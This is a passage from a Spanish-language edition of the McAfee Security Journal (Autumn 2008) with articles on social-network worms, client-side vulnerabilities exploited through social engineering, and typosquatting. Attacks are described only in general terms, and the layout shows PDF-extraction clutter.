¿Cuál es la situación actual? Dos años y medio después de que hiciera su aparición Samy, el primer gusano de redes sociales de propagación generalizada (aparecido el 4 de octubre de 2005), la mayoría de las vulnerabilidades de seguridad han sido ya corregidas. Pero eso no quiere decir que el problema haya desaparecido. Mientras los fallos de seguridad no consigan reducir el número de suscriptores, las vulnerabilidades serán moneda común. Además, las vulnerabilidades de secuencias de comandos entre sitios, como las que aprovechaba Samy, se encuentran entre las más registradas en la base de datos de vulnerabilidades y exposiciones comunes (CVE)1. Y es de esperar que la situación empeore antes de que asistamos a una mejora. En mayo de 2007, Facebook lanzaba la plataforma Facebook, que permitía a desarrolladores de terceros crear y comercializar aplicaciones entre sus 20 millones de usuarios activos. Un año y otros 50 millones de usuarios más tarde, se han desarrollado más de 20.000 aplicaciones de Facebook, y el 95% de los usuarios han ejecutado al menos una de ellas2. Estas aplicaciones representan riesgos adicionales; los usuarios pueden tener un falso sentido de seguridad derivado del hecho de que asocian las aplicaciones con un sitio en el que confían: Facebook.com. Sin embargo, la realidad es que en la mayoría de los casos el sitio no realiza una revisión previa a la comercialización de las aplicaciones. En enero de 2008, Facebook censuró la aplicación Secret Crush cuando se supo que convencía a los usuarios para instalar la aplicación de adware Zango3. (En la Figura 1 se incluyen ejemplos de amenazas generalizadas.) Es conveniente destacar que Facebook no revisa las aplicaciones y que la situación puede “írsele de las manos”, como, de hecho, ya ha ocurrido. Aunque este caso no supuso más que una molestia (adware), el siguiente podría ser mucho peor. Amenazas de redes sociales descritas TIPO
SITIO
Grey Goo
gusano
Second Life
JS/QSpace
gusano
MySpace
JS/SpaceFlash
gusano
MySpace
JS/SpaceTalk
ladrón de información
MySpace
AMENAZA
Gusano Kut Pérdida masiva de fotos privadas PWS-Banker! 1d23 Samy Scrapkut Secret Crush Gusano Xanga
gusano
orkut
fuga de datos
MySpace
ladrón de contraseñas
orkut
gusano
MySpace
gusano
orkut
programa no deseado
FaceBook
gusano
Xanga
Figura 1: Los gusanos y otras amenazas inundan los sitios de redes sociales. Con frecuencia los usuarios confían demasiado en los sitios de su comunidad.
Cada vez que hace clic en un vínculo, valora un blog o chatea sobre un tema específico, el sitio adquiere sobre usted datos para mejorar su red social.
Aproximadamente nueve meses después de que Facebook lanzara su plataforma, MySpace hizo lo propio. Google ha lanzado también recientemente una interfaz de programación de aplicaciones (API) para orkut, su sitio de red social. Aunque estas plataformas han creado el marco para la próxima generación de sitios de redes sociales, también son responsables de la creación de otro vector que pueden aprovechar los agresores.
¿Qué nos depara el futuro? Los sitios de redes sociales que aparezcan en el futuro tendrán una mayor repercusión debido a que las plataformas alcanzarán mayores niveles de ampliación. Las nuevas aplicaciones incluirán información de movilidad, presencia y ubicación, con el objetivo de facilitar la vida física del usuario a través de su red virtual; los usuarios tendrán una red social portátil en el bolsillo. No sólo podrán saber qué amigos de la red están conectados, sino que también podrán saber si hay alguno cerca. Los sistemas de triangulación de torres celulares y de posicionamiento global informarán de la ubicación de los usuarios a todas las personas que éstos autoricen. Los servicios de localización geográfica podrían mostrar los comercios locales y las atracciones adecuados según sus intereses, basándose en su perfil. Las personas en viaje de negocios podrían organizar más fácilmente las reuniones con colaboradores y clientes, en congresos y ferias comerciales. La emoción de las citas online podría aumentar a través de la creación de comunidades en lugares determinados, por lo que no sólo conocería a alguien a través de Internet, sino que también podría chatear con una pareja potencial en la misma habitación. Los sitios sociales ganarán en inteligencia, ya que podrán extraer información del usuario de toda la Web. Sitios de marcadores sociales, como Digg, se unirían a las redes sociales y mejorarían gracias a la tecnología de autoaprendizaje, como Pandora o StumbleUpon y la funcionalidad de etiquetado, como Flickr. El resultado es un flujo constante y perfeccionado de información relevante, que educa e informa a la comunidad de una manera mucho más eficaz que en la actualidad. Podrá recibir recomendaciones de los miembros de su red directamente en su iPhone. Podrá, por ejemplo, leer reseñas que sus amigos han considerado interesantes y averiguar el horario de la función en los teatros cercanos. Después, podrá comprobar dónde se encuentran sus amigos para saber cuánto tiempo tardarán en reunirse con usted. Los sitios conocerán sus intereses en función de su comportamiento: por ejemplo, los sitios Web que visita, los artículos que lee, la música que escucha, los amigos con los que chatea y los intereses de éstos. Esta información servirá para mantenerle al día sobre cambios en los eventos y para filtrar el "ruido" que tienen que soportar los usuarios OTOÑO 2008
29
en la actualidad. El resultado será una experiencia Web enormemente personalizada que requiere una mínima intervención directa del usuario. Si consideramos que la Web 1.0 estaba controlada por los administradores de los sitios y la Web 2.0 por el contenido generado por los usuarios, el futuro de las redes sociales está en la mejora de las relaciones entre el usuario y el contenido, basada en que el comportamiento del usuario permite adaptar el contenido. En las primeras encarnaciones de los sitios de la próxima generación, llamadas Redes sociales 3.0, puede llegar incluso a sobrecoger el nivel de exactitud de la “inteligencia artificial”. La generación de perfiles adquiere un significado distinto en este reino, donde el sitio puede realmente reunir a usuarios de intereses similares. En algunos aspectos, la generación de perfiles de compatibilidad que utilizan las agencias de contactos online se podría considerar una encarnación anticipada de la creación de conexiones sociales a través de la generación de perfiles online para unir a personas compatibles; sin embargo, en las redes sociales 3.0, este concepto se amplía de manera importante sin necesidad de rellenar un extenso cuestionario. Cada vez que hace clic en un vínculo, valora un blog o chatea sobre un tema específico, el sitio adquiere sobre usted datos para mejorar su red social. ¿Quién se beneficia de esta explosión de correlación de información? Qué duda cabe que la base de usuarios es un factor desencadenante, pero hay también otros que intentan beneficiarse de esta circunstancia. A los anunciantes se les hace la boca agua cuando piensan en tasas de conversión más elevadas cuando el marketing se desarrolla a nivel de usuarios, en función de sus intereses específicos. Prestarán atención a la publicidad más usuarios y, por lo tanto, se interesarán en su contenido.
Mayores riesgos Así como aumentan las ventajas para el usuario, también se incrementan las oportunidades para los agresores. Los creadores de spam y los falsificadores buscarán la manera de aprovechar esta mina de información y la utilizarán para generar más fácilmente ataques de ingeniería social convincentes. El nivel de detalle y personalización de los mensajes del ataque cogerá a los usuarios por sorpresa. Las redes de bots sociales también dispondrán del potencial para perturbar seriamente el ecosistema, envenenando la red con molestas peticiones y falsos testimonios. Los administradores de sitios se verán obligados a corregir muchos errores para mantener un nivel de calidad elevado, conseguir detener a los ciberdelincuentes al tiempo que permitir al resto realizar un uso adecuado el sitio. La protección de las redes sociales futuras dependerá principalmente de las defensas del lado del servidor. Los sistemas servidor deberán analizar grandes cantidades de datos entrantes y salientes en búsqueda de rastros de código dañino o maligno. Los servicios de clasificación de la reputación de los sitios y el contenido pueden ayudar a encontrar un equilibrio entre usabilidad y seguridad. La relación de confianza entre sitios y usuarios es clave para el éxito de las redes del mañana. Romper esa confianza puede tener consecuencias nefastas para toda la comunidad.
30
McAFEE SECURITY JOURNAL
El uso cada vez mayor de perfiles abiertos y portátiles, aplicaciones Web híbridas (aplicaciones que combinan contenido de varias fuentes en una sola herramienta) e interfaces API abiertas facilitarán enormemente el uso entre sitios, pero al mismo tiempo aumentará la complejidad a la hora defenderse frente a las amenazas que tienen como objetivo estos vectores. En la actualidad los ataques que emplean varias capas son difíciles de localizar y lo serán más aún en el futuro. Los ataques pueden generarse en un solo sitio únicamente para propagarse a través de otro antes de aparecer en una red social infectada. Las defensas basadas en host tendrán que negociar las relaciones que mantienen los sitios entre sí para reconstruir las interacciones válidas y no válidas entre sitios, y poder separar el grano de la paja. Es muy probable que muchos usuarios consideren las preocupaciones sobre la privacidad que incluye este artículo, recopilación y correlación de información, y seguimiento de ubicaciones, demasiado importantes para ser ignoradas. De hecho, mucha gente decidirá no participar en estos servicios. Sin embargo, cuando los usuarios vean que se pueden beneficiar proporcionando un poco de información y que han establecido relaciones de confianza, muchos de ellos no dudarán en ofrecer más detalles. Los proveedores están plenamente al corriente de este hecho y animan a los usuarios a ir paso a paso, por ejemplo, permitir que se comuniquen las ubicaciones de forma específica, únicamente por provincia o ciudad. Desafortunadamente, los predadores online estarán al acecho y las vulnerabilidades de seguridad pueden tener funestas consecuencias cuando esta información cae en manos de los ciberdelincuentes. Este es un momento apasionante para los sitios de redes sociales, que se amplían con rapidez, añaden funcionalidades y aumentan sus bases de usuarios. Estos sitios están tasados en miles de millones de dólares. Se vislumbran grandes cambios, a la vez emocionantes e intimidatorios; desde muchos puntos de vista, el futuro de los sitios de redes sociales define el futuro de la propia Internet.
El investigador en materia de amenazas informáticas Craig Schmugar lleva desde el año 2000 investigando y luchando contra amenazas para McAfee Avert Labs. Durante todo este tiempo ha descubierto y clasificado miles de amenazas nuevas, entre ellas, los gusanos Blaster, Mydoom, Mywife y Sasser. Admite que durante este tiempo ha empezado a sentirse un poco más "insociable".
NOTAS 1 http://cwe.mitre.org/documents/vuln-trends/index.html 2 http://www.facebook.com/press/info.php?statistics 3 http://www.zdnet.com.au/news/security/soa/Spyware-claims-kill-off-Facebooks-Secret-Crush/0,130061744,339284896,00.htm?omnRef=http://www.google. com/search?num=100
La nueva cara de las vulnerabilidades Rahul Kashyap
Si bien es cierto que la ingeniería social no interviene en todas las formas de amenazas de seguridad, últimamente McAfee Avert Labs ha observado una tendencia creciente: los creadores de malware hacen uso de la ingeniería social para aprovechar las vulnerabilidades del software. La mayor parte de los tristemente célebres gusanos de Internet aparecidos en la primera mitad de la década aprovechaban en su mayoría una o varias vulnerabilidades de las aplicaciones de Microsoft. Los conocidos Sasser, Blaster, Code Red y SQL Slammer tenían un factor en común. (Por cierto, Avert Labs descubrió Sasser y Blaster, así como otro malware importante.) Todos ellos aprovechaban vulnerabilidades de servidores. Estaban concebidos para, tras aprovechar los fallos de los servidores, servirse de su rápida autopropagación para destruirlos. A pesar de que otras aplicaciones pertenecientes a un gran número de proveedores han sido víctimas de brechas de seguridad similares, en este artículo nos centraremos en las vulnerabilidades y tendencias en aplicaciones de Microsoft. Con ello no pretendemos decir que Microsoft sea particularmente vulnerable, sino que reconocemos que la popularidad de sus aplicaciones entre particulares y empresas ha convertido a esta empresa en el objetivo principal de los creadores de malware y los ladrones de datos. Avert Labs ha constatado que, gracias a las medidas de seguridad adoptadas para proteger las llamadas de procedimientos remotos, las vulnerabilidades de los servidores que pueden ser aprovechadas por gusanos han experimentado un descenso en los últimos años. Para ilustrar estos datos, en la Figura 1 se muestran las vulnerabilidades susceptibles de ser aprovechadas de forma remota a través de llamadas de procedimientos remotos de Microsoft Windows durante un período de 10 años y hasta el primer trimestre de 2008. Se puede observar como la tendencia ha descendido de manera importante en los últimos dos años. Observamos una tendencia similar si nos fijamos en las vulnerabilidades susceptibles de ser explotadas en otras populares plataformas de servidor de Microsoft, como IIS Web Server, SQL Server y otras. Microsoft fortaleció aún más sus defensas con la publicación del Service Pack 2 para Windows XP. Junto con otros mecanismos de protección, el SP2 incluía la prevención de ejecución de
datos2, que, si bien no era infalible3, sin duda ayudó a frenar la propagación de gusanos de red que hasta ese momento acosaba a Windows. Los efectos del SP2 de XP se hicieron mucho más patentes un par de años después, cuando un gran número de usuarios realizaron la migración al sistema operativo actualizado. Sin embargo, los creadores de malware no se iban a dejar vencer. No tardaron mucho en cambiar de objetivo, pasando de servidores a clientes, y destapando vulnerabilidades en Microsoft Office, Microsoft Internet Explorer y varios formatos de archivo de marca registrada. El asalto a los clientes dio lugar a una gran cantidad de los denominados "fuzzers"4 (cuyo objetivo es buscar brechas de seguridad mediante el lanzamiento de datos aleatorios a una aplicación), errores de análisis de lenguaje de secuencias de comandos y vulnerabilidades relacionadas con controles ActiveX. Proyectos como el llamado “Mes de los errores de navegador”5 (y otros), axfuzz6, COMRaider y hamachi7 hicieron crecer el interés en esta área y ayudaron a poner de manifiesto los innumerables problemas que acosan al software Parches de vulnerabilidades remotas de Microsoft 14 12 10 8 6 4 2 0 1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
Figura 1: Desde 2006, Microsoft ha reforzado considerablemente la seguridad de sus llamadas de procedimientos remotos. (Fuente: Microsoft1).
OTOÑO 2008
31
Parches para vulnerabilidades de Microsoft Office
Ataques dirigidos a un objetivo
40
La clave de las vulnerabilidades de los clientes radica en que para poder ser aprovechadas requieren la intervención del usuario. De ahí que los creadores de malware se hayan visto obligados a ingeniar ideas más innovadoras para atraer a los usuarios y conseguir que hagan clic en vínculos, y descarguen imágenes y documentos de Internet. Una de las principales ofensivas sobre los sistemas cliente ha sido el rápido crecimiento del spam basado en la ingeniería social.
45
35 30 25 20 15 10
La ingeniería social y el interés actual en las vulnerabilidades de los clientes van de la mano. La relación entre estos dos factores es obvia y, últimamente, la amenaza ha pasado a ser más compleja.
5 0 1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
Figura 2: Las vulnerabilidades de Microsoft Office aumentaron en 2006 y han seguido ese ritmo en los dos años posteriores. (Fuente: Microsoft).
cliente. Durante este período, el descubrimiento de errores y el aprovechamiento de vulnerabilidades en aplicaciones cliente han vivido su momento álgido; esta tendencia continúa incluso mientras preparamos esta revista. No resulta fácil determinar el número de aplicaciones cliente que sufren ataques, pero algunas fuentes aseguran que se trata de cientos de millones8. En la Figura 2 se ofrece una clara muestra del acusado incremento de las vulnerabilidades relacionadas con Microsoft Office. Aunque el peor momento se vivió en 2006, todavía hoy es un problema que mantiene la atención de Microsoft. La mayoría de estas vulnerabilidades han afectado a Office 2000. Esta versión es la más utilizada, y por lo tanto la que sufre un mayor número de ataques. Desde el punto de vista económico, las vulnerabilidades en Office 2000 son las más rentables para los creadores de malware. El motivo principal es que esta suite ha tenido durante mucho tiempo un gran inconveniente para la seguridad: los usuarios de Office 2000 deben visitar la página de actualizaciones “Office update” de Microsoft para descargar parches9 y las actualizaciones online automáticas no se ocupan de Office 2000 ni de Office 97. Este descuido ofrece a los creadores de malware una oportunidad excepcional para aprovecharse de que muchos usuarios rara vez actualizan sus suites Office10. El número de equipos “zombi” invadidos a causa de este tipo de brecha de seguridad podría alcanzar las decenas de miles. Aunque, como ya hemos señalado, en este artículo nos ocupamos principalmente de las vulnerabilidades de las aplicaciones de Microsoft, la tendencia afecta a otros conocidos proveedores de software cliente, como Adobe, Mozilla o Apple, entre muchos otros. El llamado ”Mes de errores en Apple” puso de relieve muchos problemas de los clientes y se ha producido un fuerte repunte en las vulnerabilidades encontradas en aplicaciones de software de uso generalizado, como Apple QuickTime, Adobe Flash Player y Reader, por nombrar sólo algunas. El reciente aprovechamiento de la vulnerabilidad relacionada con la funcionalidad mailto: y los archivos PDF (CVE-2007-5020)11, y de Flash mediante el uso de ActionScript (CVE-2007-0071) fueron algunos los problemas críticos que afectaron a miles de usuarios.
32
McAFEE SECURITY JOURNAL
Parte de esa complejidad reside en los ataques de ingeniería social dirigidos a un objetivo, que son la tendencia emergente en el panorama de amenazas. Estos ataques son especialmente populares en instalaciones militares y de defensa12. Desde la plaga de vulnerabilidades de Microsoft Office en 2006, han salido a la luz varios informes sobre algunas agencias gubernamentales que han recibido mensajes de correo electrónico con archivos malignos de Word, PowerPoint o Access. Parece que la combinación de la ingeniería social y las vulnerabilidades ha encontrado otro objetivo: el espionaje. Está claro que espiar es una práctica más furtiva y difícil de descubrir que los ataques con un mero objetivo económico. En muchas ocasiones, las vulnerabilidades descubiertas en estos documentos incrustados maliciosos han sido ataques de tipo zeroday (día cero), lo que hace que estos documentos sean todavía más difícil de detectar: con frecuencia, sólo se detectan cuando el daño ya está hecho. El hecho de que estas vulnerabilidades de tipo zero-day hayan estado dirigidas a instalaciones gubernamentales o militares específicas hace pensar que estos ataques estén financiados por agentes o gobiernos extranjeros. Ingeniería social especialmente diseñada, vulnerabilidades de tipo zero-day, dinero y poder son elementos que nos transportan a una novela de John le Carré. Pero algunos analistas de seguridad piensan que esto no es ficción. Las predicciones de muchos teóricos apuntan en la dirección de que las guerras de la próxima generación se librarán en el ciberespacio ¿Serán estos acontecimientos sencillamente experimentos para preparar una ciberguerra?
Piratas furtivos de la Web Otros ataques en los que se ha observado últimamente un cambio de comportamiento son la piratería y el secuestro de servidores Web. En el pasado, tras asaltar los sitios Web, los agresores los marcaban, generalmente dejando una nota con la esperanza de hacerse famosos. Esto ya no ocurre, al menos con la nueva generación de sofisticados piratas. Ante la plétora de vulnerabilidades de clientes, los piratas informáticos han comenzado a aprovecharlas de manera coordinada. Para propagar el malware, en primer lugar atacan sitios Web muy visitados, dejan el malware de manera inadvertida y atraen a los usuarios a través de trucos de ingeniería social.
Como ejemplo destacado de esta técnica merece la pena mencionar el ataque realizado en febrero de 2007 a la Super Bowl (final de fútbol americano). En este caso, los piratas insertaron código JavaScript maligno en la página de inicio del sitio oficial13. La secuencia de comandos aprovechaba dos fallos en Internet Explorer e infectaba a los usuarios que no tenían instalado el parche con un troyano que se conectaba a un servidor chino, proporcionando acceso total al equipo infectado. Se ha tenido conocimiento de ataques similares a muchos sitios Web muy visitados, incluidos los de embajadas, grupos de noticias y grandes empresas. Otra nueva amenaza que ha puesto en riesgo a millones de hogares consiste en aprovechar los enrutadores domésticos a través de Universal Plug and Play, lo que permite a un archivo Flash maligno incrustado en una página Web reconfigurar el enrutador de la víctima14. (El hecho de que la inmensa mayoría de los usuarios utilicen las contraseñas predeterminadas en los enrutadores de sus hogares explica el éxito de este ataque.) En esta situación, para atraer a la víctima se podría utilizar cualquier vínculo aparentemente inofensivo para pagar facturas online o leer más sobre un tema determinado. Lo más probable es que el usuario no tenga ni idea de que el enrutador ha sido atacado, haciendo que todo el tráfico, incluidas las contraseñas más confidenciales, se envíe a un tercero.
Nuevos vectores de ataque En la primera mitad de esta década hemos observado un gran aprovechamiento de desbordamientos de pila, memoria heap (o memoria dinámica) y enteros, vulnerabilidades de cadenas con formato y otros errores, la mayor parte de los cuales con relativamente fáciles de aprovechar desde el punto de vista técnico. En la actualidad, sin embargo, la mayoría de estos sencillos desbordamientos de pila ya no suponen una gran amenaza en software muy utilizado, como Windows, gracias al excepcional desarrollo del software y a las pruebas de control de calidad. Además, tecnologías como la aleatorización del esquema del espacio de direcciones (ASLR) han forzado a los piratas informáticos a dejar atrás los mecanismos tradicionales de ataque. El ataque a las vulnerabilidades ha entrado en una nueva fase en la que conceptos como punteros Null15 y condiciones de carrera16,
NOTAS
1 http://www.microsoft.com/technet/security/current.aspx 2 “Cómo configurar la protección de la memoria en Windows XP SP2.” http://www.microsoft.com/spain/technet/recursos/articulos/depcnfxp.mspx 3 “Analysis of GS protections in Microsoft Windows Vista.” (Análisis de las protecciones GS en Microsoft Windows Vista) http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf 4 ”Browser Fuzzing for fun and profit.”(Incordiar al navegador por diversión y dinero), http://blog.metasploit.com/2006/03/browser-fuzzing-for-fun-and-profit.html 5 “Month of Browser Bugs,” (Mes de los errores de navegador) http://blog.metasploit.com/2006/07/month-of-browser-bugs.html 6 “AXFUZZ: An ActiveX/COM enumerator and fuzzer.” (AXFUZZ: un enumerador y fuzzer de ActiveX/COM) http://sourceforge.net/projects/axfuzz/ 7 “Hamachi,” de H D Moore y Aviv Raff. http://metasploit.com/users/hdm/tools/ hamachi/hamachi.html 8 “637 million Users Vulnerable to Attack,” (673 millones de usuarios vulnerables a ataques) Frequency X. http://blogs.iss.net/archive/TheWebBrowserThreat.html 9 “Mantener actualizado el sistema operativo: preguntas más frecuentes." http://www.microsoft.com/spain/protect/computer/updates/faq.mspx
así como el desarrollo de técnicas de ataque fiables, como la denominada "heap spray"17, ganan en popularidad. Muchos de estos errores han estado ahí desde hace mucho tiempo y siempre se consideraron como imposibles de aprovechar. Podría ser el momento perfecto para que estas técnicas aprovechen los trucos de ingeniería social como uno de los vectores de ataque por las siguiente razones: •
En la actualidad no existen métodos automáticos y fiables conocidos, para aprovechar estas nuevas técnicas (principalmente para la propagación masiva).
•
Pueden probarse fácilmente en individuos o grupos elegidos, a través de la ingeniería social como parte del proceso de desarrollo.
•
La rentabilidad de estas técnicas es mayor si se utiliza la ingeniería social que si se dedican los esfuerzos a aumentar la investigación para conseguir la propagación masiva.
Conclusión Las tendencias recientes en vulnerabilidades convierten a la ingeniería social en una fuerza difícil de combatir. No importa cuántos mecanismos de protección implementen los proveedores en su software y en sus sistemas operativos, mientras los usuarios sigan haciendo clic en cualquier vínculo que les salga al paso, la ingeniería social los desarticulará todos. Al menos a corto plazo, no parece que podamos esperar la aparición de "ciberleyes" que pongan freno a la ingeniería social (excepción hecha de los casos de fraude); sin embargo, una mejor educación puede sin duda ayudar a minimizar las pérdidas y el impacto sobre las víctimas desprevenidas. Mientras tanto, piénseselo dos veces si le piden que haga clic para “aceptar” el premio que acaba de ganar.
Rahul Kashyap es director de investigación sobre vulnerabilidades y seguridad de sistemas de prevención de intrusiones (IPS) para McAfee Avert Labs. Es responsable de la investigación de vulnerabilidades, análisis de vulnerabilidades de tipo zero-day, contenido de sistemas de prevención de intrusiones y respuesta de emergencia. Kashyap es un gran seguidor de Dilbert y espera poder comenzar algún día su propio cómic satírico acerca de la seguridad. 10 ”MS Office Flaws Ideal Tools for Targeted Attacks.” (Los fallos en MS Office herramientas ideales para ataques dirigidos a un objetivo) http://blog.washingtonpost.com/securityfix/2006/04/ ms_office_flaws_ideal_tools_fo_1.html 11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/ 12 “The New E-spionage Threat.” (La nueva amenaza del espionaje electrónico) http://www.businessweek.com/print/magazine/content/08_16/b4080032218430.htm 13 “Dolphins’ Web sites hacked in advance of Super Bowl.” (Los sitios Web del Dolphin Stadium y de los Miami Dophins pirateados como adelanto de la Super Bowl) http://www.networkworld.com/news/2007/020207-dolphins-web-sites-hacked-in.html 14 “Hacking the interwebs,” (Pirateando la InterWeb) 12 de enero de 2008. http://www.gnucitizen.org/blog/hacking-the-interwebs/ 15 ”Application-Specific Attacks: Leveraging the ActionScript Virtual Machine.” (Ataques específicos a aplicaciones: aprovechando la máquina virtual ActionScript) http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf 16 “Unusual Bugs,” (Errores inusuales) Ilja van Sprundel. http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf 17 “Heap Feng Shui in JavaScript.” (Heap Feng Shui en Java Script) http://www.determina.com/security.research/presentations/bh-eu07/ bh-eu07-sotirov-paper.html (es necesario registrarse)
OTOÑO 2008
33
Aventuras involuntarias de navegantes Benjamin Edelman
Mientras navega por la Web puede verse expuesto a una gran variedad de ataques que se encuentran bien descritos en la publicación McAfee Security Journal. Desde banners malintencionados hasta programas de adware, los sitios que pretende visitar pueden causar daños importantes. No obstante, los usuarios también deberían ser conscientes de los sitios que no tienen intención visitar: los sitios a los que llegan por accidente.
los navegadores Web añadirán automáticamente un “.com” a un dominio sin dominio de nivel superior, de forma que también registran dominios como “www.mcafeecom.com”. Incluso, algunos se especializan en añadir prefijos “http” o en registrar el correspondiente .com para dominios que realmente residen en otros dominios de nivel superior.
Estrategia básica
¿Cómo terminan los usuarios en estos sitios de “ocupación tipográfica”? Algunos usuarios sencillamente olvidan el nombre exacto del sitio. Otros pueden teclear errores. (Pensemos en los que hablan inglés pero no son nativos, en usuarios con visión reducida y en aquellos que todavía no están muy duchos en el uso de un teclado.) Puede que usuarios con poca experiencia no conozcan la puntuación correcta de la dirección completa de un sitio o que usuarios con prisa introduzcan erróneamente una parte de la URL. Incluso los usuarios más sofisticados pueden cometer errores en un dispositivo móvil con un teclado pequeño, en un tablet PC con reconocimiento de escritura manual, o durante un recorrido lleno de baches en un automóvil. Por tanto, no estaría bien culpar a los usuarios de “solicitar” sitios de typosquatting. Al contrario, aunque es verdad que los usuarios terminan en estos sitios, generalmente lo hacen por error.
Para los que nos equivocamos de vez en cuando al teclear una dirección URL, existe una clase especial de amenaza de seguridad que hay que vigilar. Esta plaga del mecanógrafo imperfecto se conoce como typosquatting (ciberocupación basada en errores tipográficos). La estrategia del typosquatter es anticiparse a los nombres de dominio que los usuarios podrían “solicitar” de forma accidental. Por ejemplo, un usuario comete un error al teclear “bankofamerica.com”: teclea dos veces la “k” y omite la “e”; el resultado es “bankkofamrica.com”. Normalmente, ese usuario recibiría un mensaje de error del navegador, que lo dirigiría al sitio correcto de Bank of America. Pero imaginemos que alguien ha previsto el error del usuario. El typosquatter podría tener registrado el dominio mal escrito (y otras variaciones del error tipográfico) con la esperanza de que los usuarios acaben cometiendo el error y accedan a él. Históricamente, los typosquatters se centraron fundamentalmente en los errores ortográficos: insertar una letra equivocada, omitir una letra o intercambiar dos letras. Pero, últimamente, los typosquatters han encontrado otras formas ingeniosas de atraer el tráfico involuntario. Supongamos que un usuario omite el punto que separa “www” del nombre de dominio del sitio, por ejemplo, “wwwmcafee.com” en lugar de “www.mcafee.com”. Los typosquatters pueden registrar ese dominio. (De hecho, alguien lo hizo. McAfee está intentando recuperarlo.) En el caso de los puntos finales, los typosquatters prevén correctamente que
34
McAFEE SECURITY JOURNAL
Alcance de este fenómeno El typosquatting se ha extendido sorprendentemente debido a la gran cantidad de usuarios que cometen algún tipo de error. El servicio McAfee SiteAdvisor® realiza continuas búsquedas de typosquatters: en la inspección de mayo de 2008 llevada a cabo por McAfee Avert Labs encontramos más de 80.000 dominios ocupados asociados a sólo los 2.000 sitios Web más importantes. La incidencia del typosquatting es todavía mayor a medida que profundizamos en la Web.
Los dominios frecuentados por niños son objetivos particularmente interesantes para los typosquatters. Por ejemplo, un análisis reciente identificó 327 registros diferentes que eran todos variantes cercanas a “cartoonnetwork.com”. La lista, recopilada con tecnología SiteAdvisor, la encabezaba Feecreditreport.com; YouTube, Craigslist, Wikipedia y Bank of America también ocupaban un lugar destacado. (Para conocer las cifras exactas, consulte la Figura 1. Y para ver algunos ejemplos de errores ortográficos creativos, consulte el Apéndice.)
Reacción legal En general, la práctica del typosquatting es ilegal en Estados Unidos. La Ley para la protección de los consumidores frente a la ciberocupación de 1999 (ACPA, Anti-cybersquatting Consumer Protection Act), título 15 del código USC, § 1125(d), prohíbe el registro, tráfico de entrada o utilización de nombres de dominio que sean idénticos o puedan confundirse con una marca o nombre famoso. La ACPA reconoce daños por los beneficios fraudulentos del typosquatter (título 15 de USC, § 1117(a)(1)), o indemnizaciones entre 1.000 y 100.000 dólares por dominio ocupado (a criterio del tribunal) (§ 1117(d)).
DOMINIO
NÚMERO DE DOMINIOS DE TYPOSQUATTING
freecreditreport.com
742
cartoonnetwork.com
327
youtube.com
320
craigslist.org
318
blogspot.com
276
clubpenguin.com
271
wikipedia.com
266
runescape.com
264
miniclip.com
263
bankofamerica.com
251
dailymotion.com
250
metroflog.com
249
addictinggames.com
248
friendster.com
246
myspace.com
239
verizonwireless.com
238
facebook.com
235
Las leyes de otros países tratan el typosquatting de un modo algo distinto, pero la mayoría de las naciones ven esta práctica como una infracción de marca comercial, y por tanto la prohíben. Además, la directiva para la resolución uniforme de disputas (UDRP, Uniform Dispute Resolution Policy) establece un arbitraje para las reclamaciones sobre dominios ilegales. Para registrar un sitio en un dominio principal de nivel superior, el registrante debe someterse a la jurisdicción de la UDRP, por lo que esta directiva se aplica independientemente de la ubicación del sitio de typosquatting. Dicho esto, las reparaciones de la directiva UDRP se limitan a la confiscación de un dominio ilegal y no contemplan sanciones económicas. A pesar de la elevada cuantía de las multas que impone la ACPA, los typosquatters parecen ampararse en la escasa probabilidad de ser perseguidos por sus actividades, y la realidad es que continúan campando a sus anchas.
Estrategia financiera de los typosquatters Una vez que un usuario llega a un sitio de typosquatting, la intención del ocupa es conseguir el mayor provecho económico posible. Hace algunos años, el famoso typosquatter John Zuccarini obligó a sus involuntarios visitantes a visualizar sitios Web de sexo explícito que ellos no querían ver ni habían solicitado. Zuccarini registró al menos 8.000 dominios, que yo documenté en su totalidad1. Sin embargo, sus actividades no quedaron impunes: en septiembre de 2003, Zuccarini fue arrestado en aplicación de la Ley sobre la autenticidad en los nombres de dominio (Truth in Domain Names Act), que prohibía expresamente cualquier acción por la que “se utilice un nombre de dominio engañoso con la intención de embaucar a alguien para que vea contenido considerado obsceno”. En la actualidad, la propuesta más común para los typosquatters es la publicidad. Entre los miles de dominios ocupados que he examinado en los últimos años, es raro encontrar uno que no tenga anuncios.
El servicio McAfee SiteAdvisor realiza continuas búsquedas de typosquatters: en la inspección de mayo de 2008 del McAfee Avert Labs encontramos más de 80.000 dominios ocupados asociados a sólo los 2.000 sitios Web más importantes.
Figura 1: La lista más popular de typosquatting. En esta tabla aparece una selección de las marcas comerciales más deseadas por los typosquatters. Los datos proceden de la inspección de mayo de 2008 del servicio SiteAdvisor.
OTOÑO 2008
35
Figura 2: Un typosquatter registra un nombre de dominio similar al de un banco importante y luego, indirectamente, vende enlaces publicitarios para ese y otros bancos.
Cuando los sitios de typosquatting muestran anuncios, normal mente intentan seleccionar los “relacionados” con el sitio al que el usuario (con toda probabilidad) trataba de acceder. Así, en el ejemplo de bankkofamrica.com mencionado anteriormente, los anuncios resultantes promocionan, como era de esperar, bancos. ¿Qué bancos? El primero de la lista es el propio Bank of America. (Véase la Figura 2). ¿Sorprendido? Por una parte, la colocación de ese anuncio es útil para el Bank of America: al menos consiguen llegar hasta el cliente, a pesar de su error al escribir el nombre. Pero, por otra parte, es extraordinario que este typosquatter le pida al banco que pague para llegar a un cliente que ya había solicitado Bank of America por su nombre. Después de todo, el typosquatter está infringiendo la marca comercial de Bank of America, contraviniendo exactamente la ACPA, que estipula que dicho typosquatter no puede registrar tales dominios y que incluso se le podría obligar a pagar una cuantiosa indemnización a Bank of America si el banco presentara una demanda. Pero
36
McAFEE SECURITY JOURNAL
